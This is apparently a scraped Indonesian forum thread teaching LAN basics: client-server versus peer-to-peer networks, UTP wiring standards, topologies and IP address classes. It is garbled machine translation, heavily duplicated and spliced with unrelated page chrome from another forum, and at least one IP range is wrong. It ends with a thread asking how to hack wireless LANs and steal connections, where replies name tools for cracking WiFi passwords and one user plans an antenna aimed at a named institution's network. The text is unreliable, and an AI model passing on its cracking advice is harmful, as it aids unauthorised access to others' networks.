dan client adalah komputer-komputer yang menerima atau menggunakan fasilitas yang disediakan
oleh server. Server dijaringan tipe client-server disebut dengan Dedicated Server karena murni
berperan sebagai server yang menyediakan fasilitas kepada workstation dan server tersebut tidak
dapat berperan sebagai workstation.
Keunggulan
1. Kecepatan akses lebih tinggi karena penyediaan fasilitas jaringan dan pengelolaannya dilakukan
secara khusus oleh satu komputer (server) yang tidak dibebani dengan tugas lain sebagai
workstation.
2. Sistem keamanan dan administrasi jaringan lebih baik, karena terdapat seorang pemakai yang
bertugas sebagai administrator jaringan, yang mengelola administrasi dan sistem keamanan
jaringan.
3. Sistem backup data lebih baik, karena pada jaringan client-server backup dilakukan terpusat di
server, yang akan membackup seluruh data yang digunakan di dalam jaringan.
Kelemahan
1. Biaya operasional relatif lebih mahal.
2. Diperlukan adanya satu komputer khusus yang berkemampuan lebih untuk ditugaskan
sebagai server.
3. Kelangsungan jaringan sangat tergantung pada server. Bila server mengalami gangguan maka
secara keseluruhan jaringan akan terganggu.
Keunggulan
1. Antar komputer dalam jaringan dapat saling berbagi-pakai fasilitas yang dimilikinya
seperti:harddisk, drive, fax/modem, printer.
2. Biaya operasional relatif lebih murah dibandingkan dengan tipe jaringan client-server, salah
satunya karena tidak memerlukan adanya server yang memiliki kemampuan khusus untuk
mengorganisasikan dan menyediakan fasilitas jaringan.
3. Kelangsungan kerja jaringan tidak tergantung pada satu server. Sehingga bila salah satu
komputer/peer mati atau rusak, jaringan secara keseluruhan tidak akan mengalami gangguan.
Kelemahan
1. Troubleshooting jaringan relatif lebih sulit, karena pada jaringan tipe peer to peer setiap
komputer dimungkinkan untuk terlibat dalam komunikasi yang ada. Di jaringan client-server,
komunikasi adalah antara server dengan workstation.
2. Unjuk kerja lebih rendah dibandingkan dengan jaringan client-server, karena setiap
komputer/peer disamping harus mengelola pemakaian fasilitas jaringan juga harus mengelola
pekerjaan atau aplikasi sendiri.
3. Sistem keamanan jaringan ditentukan oleh masing-masing user dengan mengatur keamanan
masing-masing fasilitas yang dimiliki.
4. Karena data jaringan tersebar di masing-masing komputer dalam jaringan, maka backup harus
dilakukan oleh masing-masing komputer tersebut.
nah, itu sekilas tentang LAN, karena udah kebanyakan, biar gak bosen, kita udahin dulu, ntar kita
bahas tentang protokol2nya dan hardware lain yang mendukung LAN itu serta request dari teman2..
("_")
Email :Muammarsubki@yahoo.com
Website : http://www.subki.orgfree.com
c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006
--------------------------------------------------------------------------------
My Blog
My Friendster
My Facebook
jurnalis jh
View Public Profile
Send a private message to jurnalis jh
Find More Posts by jurnalis jh
--------------------------------------------------------------------------------
Quote:
Originally Posted by AlisBandung
---------------------
jadi gini, kabel UTP (ada 8 kabel warna-warni) itu kan punya standard, agar di setiap negara yang
memakainya pnya keseragaman dalam implementasinya, nah sampai saat alis mengenal UTP, ada 2
standar yag dipakai, yaitu:
1. Standard T568-A
Pin warna
--------------------
1 putih dan hijo
2 hijo
3 putih orange
4 Biru
5 putih dan biru
6 Orange
7 putih dan coklat
8 coklat
2. Standard T568-B
Pin warna
--------------------
1 putih dan orange
2 Orange
3 putih dan hijo
4 Biru
5 putih dan biru
6 hijo
7 putih dan coklat
8 coklat
2 standard itu ntar terpakai pada saat kabel digunakan untuk straight, rollover atau crossover, gini
penjelasannya:
Straight-Through
=================
Jenis kabel ini digunakan untuk menghubungkan antara workstation dengan hub/switch. Kabel ini
juga memiliki 4 pairs (8 wire) dimana setiap pin antara ujung satu dengan ujung lainnya harus
sama. Maksudnya, bila salah satu ujung memakai standard T568-A maka ujung satunya harus
memakai T568-A juga. Begitu pula sebaliknya, jika salah satu ujung menggunakan standard T568-
B, ujung satunya juga harus memakai standard yang sama.
Rollover
========
Digunakan untuk koneksi antara sebuah workstation ke port console pada sebuah router atau switch.
Standard yang digunakan adalah T568-A pada salah satu ujung dan
ujung lainnya urutan T568-A tinggal di roll (dibalik). Demikian juga jika yang dipakai
not really know where ya from nGoMongNya, but since this thread dimulail with cable, our cables
bahs little about it .. maap kalo udah boring for the tau, a pretty, for, for science to not know
cable
=====
talk about the network, would not his name off of the cable, although now its time udah wireless,
but cable will be the lesson material may not be forgotten by the network equipment, wireless now
anyway still hold to the teaching (emang silat?) wired, for example, optical etc. lah
principles still work light, cable ngubungin one side with the other side of the terminator in masing2
end, but this relationship did not lead to a closed relationship between the 2-sided, can be set to
open 2 connections with the other side
now you've advanced age, so the cable topology is also growing, from the telegraph era technology
that make up its time radio and optical fiber lasers.
This type of cable, not to memorize his eyebrows too lho ... ngambilnya from:
http://www.glossary-tech.com/cable.htm and http://www.firewall.cx/cabling_utp.php
Giving 1/2/3/4/5/6 category is the category specifications for each copper cable and also for jack.
Each is a series of revisions for the quality of cable, quality cable wrap (insulation) and also for the
quality of "entanglement" (twist) of each pair of wires. In addition, to determine the frequency scale
can pass on the cable facilities, and also the quality of insulation that can reduce the induction effect
between the wires (noise can be suppressed in such a way ).------> physics banget tuh
Keep in mind also (ingak.. Ingak), the specification between CAT5 and CAT5 has enchanced the
same industry standard, but the CAT5e already equipped with insulation to reduce the effects of
induction or electromagnetic interference. CAT5e cable can be used to connect the network to
1Gbps speed. (bokkkkkk giga buset. .1)
This Coaxial cable (RG-6) when used in the specification and the network has the following rules:
* Each end should be terminated with 50-ohm terminator (terminator is recommended to use
already assembled, instead of using one 50-ohm resistors 1 watt, for dissipative voltage resistors
have a fairly wide, experts kalo, can critical nih).
* Maximum of 3 segments with the connected equipment (attached devices) or a populated
segments.
* Every network card has an additional transmitter (external transceiver).
* Each segment contains a maximum of 100 network devices, including repeaters in this case.
* Maximum cable length per segment is 1640 feet (or about 500 meters).
* Maximum distance between the segment is 4920 feet (or about 1500 meters).
* Each segment must be grounded.
* Rarely maximum of tap or pencabang from the main cable to the device (device) is 16 feet (about
5 meters).
* The minimum inter-tap Jaral is 8 feet (about 2.5 meters).
This type of cable, not to memorize his eyebrows too lho ... ngambilnya from:
http://www.glossary-tech.com/cable.htm and http://www.firewall.cx/cabling_utp.php
with English lessons capital, hhe ..
we will ngebahas ntar network topology which is a "work program" of the cable itself
hopefully helpful
__________________
Master the world with information
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-12-2006, 01:31 pm # 3
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
network topology
=================
determination of network topology will determine the type of cable we will pake, and vice versa,
the availability of cable and have gocek yangkita, a mind dong to build a network (for the future we
call the network, let cool)
actually, loads of network topology, but we often hear that only 3 doang, and that many were also
based on the 3, only the perpetrator kadang2 modify slightly depending on network conditions, eg
area, length of cord, etc.
1. ring topology
This topology Manfaatin closed curve, meaning information and data as well as distributed in such
traffic
way that to each node. These facilities generally use optical fiber as a facility
(although some are using twisted pair).
(bahasannya above)
3. star topology
Network topology is widely used in various places, because of the ease to add, reduce or detect
existing tissue damage. In addition, cable length issues that must be appropriate (matching) also did
not become an important anymore. Just from there hub (which is still wrong of course) then it could
be terhubunglah some computers and network resources easily.
Armed with crimtool, UTP cable (CAT5 usually) and the connector, one easily create a network
system. Of course there are some losses due to cable length (loss effect) or due to conduction law,
but most can say all that can be ignored.
Third exposure topology above only as an introduction. The point is that a network can be
is a combination of two or three topologies above. For example, there is a call tree topology,
where this topology is a combination or combinations of the three existing topology.
It briefly about the network topology, in fact better kalo pictures, but my eyebrows are still
confused, how ya how to upload pictures in posts?
__________________
Master the world with information
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-12-2006, 01:41 pm # 4
ihan_sunrise
Contributor
-------------------------------------------------- ------------------------------
ups load images from photobucket first to write a new ..... then enter here ... I think once dah ad
description, cuman ihan forgot what thread
__________________
My love has embraced
and I was relieved to be held
has attracted miss my
and I'm glad he's not letting me
Ihan Sunrise
http://ihansunrise.blogspot.com/
ihan_sunrise
View Public Profile
Send a private message to ihan_sunrise
Visit ihan_sunrise's homepage!
Find More Posts by ihan_sunrise
12-12-2006, 05:09 PM # 5
baiquni
Peutua
-------------------------------------------------- ------------------------------
makasih ya brow ... eyebrows share knowledge may be useful for us all amien.
My Blogs: http://www.baiquni.net/
My Wordpress: http://baiquni.wordpress.com/
My Friendster: http://www.friendster.com/mbaiquni
My Bussiness: http://www.ipulsa.net/
baiquni
View Public Profile
Send a private message to baiquni
Visit baiquni's homepage!
Find More Posts by baiquni
12-15-2006, 12:58 PM # 6
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by baiquni
makasih ya brow ... eyebrows share knowledge may be useful for us all amien.
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-15-2006, 01:32 PM # 7
sHinOsuke
Super Moderator
Join Date: Feb 2006
Posts: 1.363
Thanks: 16
Thanked 47 Times in 14 Posts
-------------------------------------------------- ------------------------------
sHinOsuke
View Public Profile
Send a private message to sHinOsuke
Find More Posts by sHinOsuke
12-15-2006, 03:33 PM # 8
aloysurf
Photographer
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by AlisBandung
It briefly about the network topology, in fact better kalo pictures, but my eyebrows are still
confused, how ya how to upload pictures in posts?
Regard
aloysurf
View Public Profile
Send a private message to aloysurf
Visit aloysurf's homepage!
Find More Posts by aloysurf
12-17-2006, 11:22 PM # 9
Muiz
Peutua
Join Date: Dec 2006
Posts: 752
Thanks: 0
Thanked 5 Times in 2 Posts
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by AlisBandung
amen ... eyebrows not think there is a response, hhe ..
ntar we start again with the LAN ... but now again searching first bahan2 TA, tomorrow it in
another connection
ow .. steadily busy flying again instead of TA could bagi2 .. oya solid science to the way it pairs
UTP cable plus a bit of donk bang,,, let me steady ... all the way for the router pc in Indonesian ... ya
bang ... sep ... steady brow bang create ..
Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz
12-18-2006, 05:29 PM # 10
Acheh
Geuchik
-------------------------------------------------- ------------------------------
Acheh
View Public Profile
Send a private message to Acheh
Find More Posts by Tsunami
12-18-2006, 09:24 PM # 11
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
@ Acheh
it bothered ya make nambahin picture here, so males are also euy .. hhe
@ Muiz
pc router and installing UTP ya ...
tomorrow we continued ya ...
@ Shinosuke
sip deh, but before the WLAN, we'll eat it aja dulu ya ..
yesterday we've ngebahas ama topologinya cable, now we'll discuss one implementation, the LAN
ni era as the development, we not only know doang LAN, but now there've WLAN, Wireless LANs
ie, the wireless LAN (simplenya so).
Local Area Network (LAN) is the number of computers that are connected together in one
particular area that is not so large, as in an office or building.
In communications, there are two types of network or LAN, a network of Peer to Peer and Client-
Server networks.
In peer to peer network, every computer connected to the network can act both as a workstation or
server. Whereas the client-server networks, only one computer that served as servers and other
computers acting as workstations. Between the two types of networks
these each have advantages and weaknesses, we'll discuss ntar lebuh far
NIC
Based on the type of buses, there are several types of network interface card (nic) or network card,
which is the ISA and PCI.
We have kind of network cards that are widely used, the PCI
for more details, see aja LAN Card-Sodara Sodara home .. not on board like a brow, hhe ..
NAD
instead we Naggroe ya, but Network Adapter Card. Each network card will have a driver or
program that serves to activate and configure the network adapter is adapted to the environment in
which network cards are installed to be used for data communication.
operating systems
OS here is not like Windows and Linux, but OS peer to peer and Client / Server. discussed satu2 ...
1. Client-Server Network
-------------------------
Servers are computers that provide facilities for other computers in the network and client are the
computers that receive or use the facilities provided by the server. Dijaringan Server client-server
type is called the Dedicated Server for purely acting as servers that provide facilities to workstations
and servers can not serve as workstation.
Advantages
1. Higher access speeds due to the provision of network facilities and management carried out
exclusively by a single computer (server) that is not burdened with other tasks as a workstation.
2. Security systems and network administration is better, because there was a user who served as a
network administrator, who manages the administration and security systems
network.
3. Data backup system is better, because on a client-server network is centered on the backup server,
which will backup all the data used in the network.
Weakness
1. Operational costs are relatively more expensive.
2. Required a special computer that is more capable for the assigned
as a server.
3. Continuity of the network depends on the server. If the server is susceptible to interference, then
the whole network will be disrupted.
2. Peer To Peer Network
--------------------------
When viewed from the role of both types of servers in the network, the network server in a peer to
peer type is termed non-dedicated server, because the server does not act as a pure server but at the
same time can serve as workstation. (lha?)
Advantages
1. Between computers in a network can share each owned facilities such as: hard disk, drive, fax /
modem, printer.
2. Operational costs are relatively cheap compared to the type of client-server network, one
only because it does not require any server that has a special ability to organize and provide
network facilities.
3. Continuity of the network work does not depend on a single server. So that if one computer / peer
dead or damaged, the entire network will not be susceptible to interference.
Weakness
1. Network troubleshooting is relatively more difficult, because the network of peer to peer type of
each computer it is possible to engage in communication that exists. In client-server network, the
communication is between the server with the workstation.
2. Lower performance compared to client-server network, because every computer / peer in addition
to managing the use of network facilities also need to manage their own job or application.
3. Network security system is determined by each user to manage the security of each facility
owned.
4. Because the network data is spread on each computer in the network, the backups should be
performed by each computer.
nah, it was a glimpse of the LAN, because've most, let me not bored, we udahin first, we discuss
about the ntar protokol2nya and other hardware that supports LAN and teman2 request ..
("_")
__________________
Master the world with information
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-18-2006, 07:28 PM # 12
Muiz
Peutua
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by Acheh
This thread more sip klo accompanied by pictures ..
eg coaxial cable, nah .. gmn coaxialnya image gtu ...
yup .. pake clearer picture added .. rame .. n eager learner makasi ...
Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz
12-18-2006, 07:56 PM # 13
Muiz
Peutua
-------------------------------------------------- ------------------------------
Muiz
View Public Profile
Send a private message to Muiz
Find More Posts by Muiz
12-20-2006, 11:33 PM # 14
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
---------------------
jadi gini, UTP cable (there are 8 colored wires) that do have standards, so that in each country that
use uniformity in the implementation pnya, well until now known UTP eyebrows, there used 2 yag
standards, namely:
1. Standard T568-A
Pin Color
--------------------
White and 1 hijo
2 hijo
3 white-orange
4 Blue
5 white and blue
6 Orange
7 white and brown
8 brown
2. T568-B standard
Pin Color
--------------------
White and 1 orange
2 Orange
3 white and hijo
4 Blue
5 white and blue
6 hijo
7 white and brown
8 brown
Ntar 2 standard is used when the cable is used for straight, rollover, or crossover, gini explanation:
Straight-Through
=================
This type of cable used to connect the workstation with the hub / switch. This cable also has 4 pairs
(8 wire) where each pin between the one end with the other end must be the same. That is, if one
end using a standard T568-A will end only had to wear T568-A as well. And vice versa, if one end
using a standard T568-B, the other end must also use the same standard.
Rollover
========
Used for connection between a workstation to the console port on a router or switch. Standard used
is T568-A on one end and
the other end of the sequence T568-A stay in roll (reversed). Likewise, if the use is T568-B
standard.
Crossover
===========
Is a type of cable used to connect between workstations or between the hub / switch. This type of
cable using standard T568-A at one end, and T568-B on the other end.
1. Cable manufacture
a) Prepare the UTP cable and RJ 45 as the interface
b) Cut the end of the cable jacket approximately 1.5 cm with a craft knife or scissors, and remove
the jacket. Be careful in peeling the jacket, do not get cable in it come truncated.
c) or open loops Untwist each pair cable
d) To create a straight-Trough cable, crossover or rollover, see the standard T568-A or T568-B
e) Match each type of cable with standardnya, then point to allow to be inserted into the RJ 45
f) When you've put into RJ 45, crimpinglah by using existing equipment in order to become
permanent and the cable is not easily shaken
g) Check the cord first before dicrimping sequence, because the cable is already dicrimping no
longer be revoked. This means that if we are wrong sort spouse or insert it into the RJ 45 or less
perfect, most likely the cable can not be used
2. Test cable
a) Cables that have been dicrimping fault can be detected using a cable tester (eg: Fluke 620 LSN
CableMeter)
b) If there is no cable tester, attach the cable from the NIC to the hub (if the type of straight-
through) and inter-workstation if the cord is kind of crossover.
c) Pekailah ping command to test the cable. If the connection can be formed, means making your
cables are correct. Conversely, if the connection can not be formed, means that there are mistakes in
the cabling process.
hopefully helpful
__________________
Master the world with information
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-20-2006, 11:37 PM # 15
journalists jh
Imum Mukim
Join Date: Nov 2006
Location: d / h AlisBandung
Posts: 2.246
Thanks: 3
Thanked 18 Times in 9 Posts
-------------------------------------------------- ------------------------------
TCP / IP
===============
Because an important role in the Windows operating system and also because the TCP / IP
a protocol option (default) from Windows. TCP is the Transport layer of the OSI model (Open
Systems Interconnection), while the IP is the Network layer of the OSI mode
IP Address
----------
IP address is the address given on computer networks and network equipment
using TCP / IP. IP addresses consist of 32-bit binary numbers that can be written as four groups of
decimal numbers separated by a dot such as 192.168.0.1.
+-------------------+-----------+
| Network ID | Host ID |
+-----+------+------+-----------+
| 192 | 168 | 0 | 1 |
+-----+------+------+-----------+
IP addresses consist of two parts of the network ID and host ID, where the network ID to determine
the network address of the computer, while the host ID to determine the host address (computers,
routers, switches).
Therefore the IP address provides the full address of a host and network address where the host is
located.
Class-class IP Address
------------------------
To facilitate the use, depending on the needs of users, IP addresses are divided into three classes as
shown below
------+------------+---------------+-------------- ------+
Classes | Network ID Host ID | Default Subnet Mask |
------+-------------+---------------+------------- -------+
A | xxx.0.0.1 | xxx.255.255.254 | 255.0.0.0 |
B | xxx.xxx.0.1 | xxx.xxx.255.254 | 255.255.0.0 |
C | xxx.xxx.xxx.1 | xxx.xxx.xxx.254 | 255.255.255.0 |
------+-------------+---------------+------------- -------+
Class B IP address is usually allocated to the network medium and large. In class B IP address,
network ID is the first 16 bits, while the host ID is 16 bits. Thus, how to read a class B IP address,
such as 132.92.121.1
Network ID = 132.92
Host ID = 121.1
So the IP address on the mean number 121.1 on the host network number 132.92. with a length of
16-bit host ID, network with the IP address class B can accommodate about 65,000 hosts. Range IP
128.0.xxx.xxx - 191.155.xxx.xxx
Class C IP address originally used for small networks (LAN). Host ID is the last 8 bits. With this
configuration, can be formed about 2 million networks with each network has 256 IP addresses.
Range IP 192.0.0.xxx - 223.255.255.x.
The allocation of IP address is basically the process of selecting the network ID and host ID is right
for a network. Right or not this configuration depends on the objectives to be achieved, which
allocates IP addresses as efficiently as possible.
Network topology is the physical description of the pattern of relationships between network
components, including servers, workstations, hubs and pengkabelannnya. There are three kinds of
commonly used network topology, ie Bus, Star and Ring.
__________________
Master the world with information
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-20-2006, 11:38 PM # 16
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-22-2006, 07:43 pm # 17
c4m4r2006
kawoem
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by AlisBandung
@ Acheh
it bothered ya make nambahin picture here, so males are also euy .. hhe
@ Muiz
pc router and installing UTP ya ...
tomorrow we continued ya ...
@ Shinosuke
sip deh, but before the WLAN, we'll eat it aja dulu ya ..
yesterday we've ngebahas ama topologinya cable, now we'll discuss one implementation, the LAN
ni era as the development, we not only know doang LAN, but now there've WLAN, Wireless LANs
ie, the wireless LAN (simplenya so).
Local Area Network (LAN) is the number of computers that are connected together in one
particular area that is not so large, as in an office or building.
In communications, there are two types of network or LAN, a network of Peer to Peer and Client-
Server networks.
In peer to peer network, every computer connected to the network can act both as a workstation or
server. Whereas the client-server networks, only one computer that served as servers and other
computers acting as workstations. Between the two types of networks
these each have advantages and weaknesses, we'll discuss ntar lebuh far
NIC
Based on the type of buses, there are several types of network interface card (nic) or network card,
which is the ISA and PCI.
We have kind of network cards that are widely used, the PCI
for more details, see aja LAN Card-Sodara Sodara home .. not on board like a brow, hhe ..
NAD
instead we Naggroe ya, but Network Adapter Card. Each network card will have a driver or
program that serves to activate and configure the network adapter is adapted to the environment in
which network cards are installed to be used for data communication.
operating systems
OS here is not like Windows and Linux, but OS peer to peer and Client / Server. discussed satu2 ...
1. Client-Server Network
-------------------------
Servers are computers that provide facilities for other computers in the network and client are the
computers that receive or use the facilities provided by the server. Dijaringan Server client-server
type is called the Dedicated Server for purely acting as servers that provide facilities to workstations
and servers can not serve as workstation.
Advantages
1. Higher access speeds due to the provision of network facilities and management carried out
exclusively by a single computer (server) that is not burdened with other tasks as a workstation.
2. Security systems and network administration is better, because there was a user who served as a
network administrator, who manages the administration and security systems
network.
3. Data backup system is better, because on a client-server network is centered on the backup server,
which will backup all the data used in the network.
Weakness
1. Operational costs are relatively more expensive.
2. Required a special computer that is more capable for the assigned
as a server.
3. Continuity of the network depends on the server. If the server is susceptible to interference, then
the whole network will be disrupted.
2. Peer To Peer Network
--------------------------
When viewed from the role of both types of servers in the network, the network server in a peer to
peer type is termed non-dedicated server, because the server does not act as a pure server but at the
same time can serve as workstation. (lha?)
Advantages
1. Between computers in a network can share each owned facilities such as: hard disk, drive, fax /
modem, printer.
2. Operational costs are relatively cheap compared to the type of client-server network, one
only because it does not require any server that has a special ability to organize and provide
network facilities.
3. Continuity of the network work does not depend on a single server. So that if one computer / peer
dead or damaged, the entire network will not be susceptible to interference.
Weakness
1. Network troubleshooting is relatively more difficult, because the network of peer to peer type of
each computer it is possible to engage in communication that exists. In client-server network, the
communication is between the server with the workstation.
2. Lower performance compared to client-server network, because every computer / peer in addition
to managing the use of network facilities also need to manage their own job or application.
3. Network security system is determined by each user to manage the security of each facility
owned.
4. Because the network data is spread on each computer in the network, the backups should be
performed by each computer.
nah, it was a glimpse of the LAN, because've most, let me not bored, we udahin first, we discuss
about the ntar protokol2nya and other hardware that supports LAN and teman2 request ..
("_")
Email: Muammarsubki@yahoo.com
Website: http://www.subki.orgfree.com
c4m4r2006
View Public Profile
Send a private message to c4m4r2006
Find More Posts by c4m4r2006
12-23-2006, 11:28 PM # 18
journalists jh
Imum Mukim
-------------------------------------------------- ------------------------------
My Blog
My Friendster
My Facebook
journalists jh
View Public Profile
Send a private message to journalists jh
Find More Posts by journalists jh
12-27-2006, 02:50 PM # 19
Muiz
Peutua
-------------------------------------------------- ------------------------------
Quote:
Originally Posted by AlisBandung
---------------------
jadi gini, UTP cable (there are 8 colored wires) that do have standards, so that in each country that
use uniformity in the implementation pnya, well until now known UTP eyebrows, there used 2 yag
standards, namely:
1. Standard T568-A
Pin Color
--------------------
White and 1 hijo
2 hijo
3 white-orange
4 Blue
5 white and blue
6 Orange
7 white and brown
8 brown
2. T568-B standard
Pin Color
--------------------
White and 1 orange
2 Orange
3 white and hijo
4 Blue
5 white and blue
6 hijo
7 white and brown
8 brown
Ntar 2 standard is used when the cable is used for straight, rollover, or crossover, gini explanation:
Straight-Through
=================
This type of cable used to connect the workstation with the hub / switch. This cable also has 4 pairs
(8 wire) where each pin between the one end with the other end must be the same. That is, if one
end using a standard T568-A will end only had to wear T568-A as well. And vice versa, if one end
using a standard T568-B, the other end must also use the same standard.
Rollover
========
Used for connection between a workstation to the console port on a router or switch. Standard used
is T568-A on one end and
the other end of the sequence T568-A stay in roll (reversed). Likewise, if used
Afrikaans
Albania
Arab
Bahasa Indonesia
Belanda
Bulgar
Byelorusia
Cek
Dansk Esti
Farsi
Galisia
Hindi
Ibrani
Inggris
Irlandia
Islan
Italia Jepang
Jerman
Katalana
Korea
Kreol Haiti
Kroat
Latvi
Lituavi
Magyar Makedonia
Malta
Mandarin
Melayu
Norsk
Pilipino
Polski
Portugis
Prancis Rumania
Kalender
Foto
Documents
Site
Grup
Bantuan
Penerjemahan
Penelusuran Diterjemahkan
Translator Toolkit
The Unordinary
Masukkan istilah pencarian Anda
Web hyem.org
Kirim formulir pencarian
PALIT HD4870
PALIT HD4870 Sonic Dual Edition DDR5, 512MB, 256bit 775/4000 Dual OC Speed (dalam
beberapa hal grafis 256bit ini masih lbh unggul dr 5770 128bit, apalagi kalo kita lihat dari
price/performancenya)
PROMO : $150
PALIT HD4850
PALIT HD4830 DDR3, 512MB, 256bit, Core:575/ Mem:1800Mhz + HDMI
Adik termuda dari keluarga RV770, Still be the Price/Performance KING!
PROMO : $90
ALL AVAILAVBE
Chat Now!
[more]
Last 20 Shouts:
--------------------------------------------------------------------------------
Panji
Today at 01:44:28 AM
Selamat buat Hendy hyem.. ganyangka lu menang bro..
an35
Today at 12:50:18 AM
ayo kita kumbah-kumbah
toms_momo
Yesterday at 10:31:02 PM
sepi mas dab...
Tito Haga
Yesterday at 07:51:15 PM
wakakakakaka
alexander_corvinus
Yesterday at 06:37:00 PM
wew do yang"an :p
B.U.G.S
Yesterday at 05:05:04 PM
@Tito Haga
kan iso nge-move tp ga nggo redirection, dadi ga metu MOVED.. MOVED.. ngunu marai MOMED
wae.. wakakaka..
coolwin
Yesterday at 04:58:26 PM
CEK UPDATE BEST KILL hari ini CF!!!!! SAYA DI PERINGKAT 2 WAKAKAKAKAKA
Tito Haga
Yesterday at 02:51:11 PM
@BUGS
hahahaha...sori2..bar tangi turu ngemoved ya ngono kui...haha
donkey
Yesterday at 01:57:41 PM
wakakakaka....
blackshield™
Yesterday at 11:54:06 AM
cilukkkkkkkk
baaaaaaa...
B.U.G.S
Yesterday at 10:39:35 AM
buset, isine kok ming moved kabeh kie..? nek nge-move topik lawas mending ga usah dikei
redirection kang..
Tito Haga
Yesterday at 08:26:27 AM
wakakakakka...senasib berati
sadnux
Yesterday at 08:20:42 AM
bukan soal bersih2 nya, tp itu lho tulisan yg di sign yg soal kuliah
ortu sering ngomong kek gitu kl pas marahin ane T_T
Tito Haga
Yesterday at 08:13:04 AM
Hahahahaha...maap2 ya...kesalahan teknis tadi le bersih2...jadi ngemovednya salah kamr jugah ::
sadnux
Yesterday at 08:09:47 AM
pagi yg indah..tp langsung ketendang sama signaturenya pak dito
wakakakak
Tito Haga
Yesterday at 07:56:09 AM
pagi kang
sadnux
Yesterday at 07:47:53 AM
met pagi semua
Tito Haga
Yesterday at 06:34:29 AM
weh...kang panji onlen
Panji
Yesterday at 06:13:51 AM
miss u all...
Tito Haga
Yesterday at 05:30:56 AM
Ndalu geng
Polling
Lates Post
Beli fingerboard dimana y... by vheebhee [Today at 03:46:23 AM]
Mo Tanya Lagi Niy.. Boleh... by Genah_wae [Today at 03:20:28 AM]
help me by botaxalim [Today at 02:04:50 AM]
TOLONG PENJELASAN MENGENA... by botaxalim [Today at 01:54:06 AM]
Update 5 Maret 2010 Cross... by botaxalim [Today at 01:36:16 AM]
[ASK] Membangun Jaringan by botaxalim [Today at 01:28:59 AM]
Asus ROG Series 890FX Mot... by Hazzan [Today at 12:24:06 AM]
guitar hero pc maen pake ... by SYXXness [Yesterday at 11:30:42 PM]
- Post Karya 3D Buatan An... by B.U.G.S [Yesterday at 10:05:46 PM]
(WTA) Cooling Procie unru... by kocek99 [Yesterday at 07:51:45 PM]
[WTA] Intel 915GAV Tit 3x... by masYogo [Yesterday at 05:45:43 PM]
(Unlocking Test) Biostar ... by sandlewood [Yesterday at 01:37:37 PM]
Software audio player by Tito Haga [Yesterday at 07:20:09 AM]
Sesuaikan DDR3 anda...!!! by masYogo [Yesterday at 05:18:00 AM]
[review] HaPe Modem "smar... by frozr_man [Yesterday at 05:08:18 AM]
AMD VS INTEL < FIGHT ! > by didit_catro' [Yesterday at 04:15:54 AM]
[Ask About] Garansi proci... by sadnux [March 04, 2010, 11:03:15 PM]
[WTA] Cara mbungkam Fan b... by SYXXness [March 04, 2010, 08:45:18 PM]
Mainboard 890gx / 890fx by frozr_man [March 04, 2010, 08:44:57 PM]
Adu Kreativitas Wallpaper by donkey [March 04, 2010, 07:16:40 PM]
Statistic
Members
Total Members: 10884
Latest: Ricko
Stats
Total Posts: 102876
Total Topics: 7713
Online Today: 56
Online Ever: 448
(April 04, 2008, 05:10:06 AM)
Users Online
Users: 15
Guests: 61
Total: 76
MARJ1NAL
Gytautas
paulpierce
myscreen
AKA2
citraxeena
best
brewox
arveds
Aero
B.U.G.S
Ricko
damonrulz
coolwin
aikendeva
Visitor MAP
berang_berang
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to berang_berang
Topic starter
--------------------------------------------------------------------------------
Kalo kita mau hack w.LAN tools2 standard apa yg kita butuhin, dan caranya gmana ?
Trus kalo pake linux tools yg disarankan apa ? kalo windows apa ?
Kalo mau nyolong koneksi internet gmana ?
--------------------------------------------------------------------------------
netstumbler & kismet buat nyari AP atau SSID yg aktif & airsnort buat ngecrack passwordnya...
manual instalasinya & tutorialnya googling aja. Kalo berhasil jgn lupa share passwordnya...........
Logged
--------------------------------------------------------------------------------
Logged
RooTrick
[ Community Member ]
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to RooTrick
--------------------------------------------------------------------------------
tuh download dmn om?
trus kalo uda dapet source code na bikin aplikasi na gmn???
thx bgt...
:mrgreen:
Logged
--------------------------------------------------------------------------------
Let the world revolves around me...
densinyo
[ Community Member ]
Trade Count: (0)
[ Enthusiast ]
Posting Quality: 0
Offline
View Inventory
Send Money to densinyo
--------------------------------------------------------------------------------
DL dmn tuh...boleh dong minta linknya...
Logged
--------------------------------------------------------------------------------
T-Force 550 ! Athlon64 X2 4000+ ! Adata 2gb ! Acbel 400w ! WDC 500gb ! DVD RW Pioneer !
DVD Lite-On ! A4Tech
-=-peduli lingkungan mulai dari diri sendiri-=-
081-5612-7812
--------------------------------------------------------------------------------
Logged
bryant
Guest
Trade Count: (0)
Re: Hacking Wireless LAN !
« Reply #4 on: March 21, 2006, 03:09:47 PM »
--------------------------------------------------------------------------------
Aku lg ada proyek nih,bikin antena kaleng buat nembak WiFinya YKPN, ada yg pernah punya
pengalaman ga bkin antena kaleng?
Cari alat n bahannya ada yg tau ga?
Ini ada sdikit tutorialnya kalo pd berminat :
You are not allowed to view links.
Register or Login
Logged
MAS
[OprekPC]
Trade Count: (0)
[ POWERED ]
Posting Quality: 0
Offline
View Inventory
Send Money to MAS
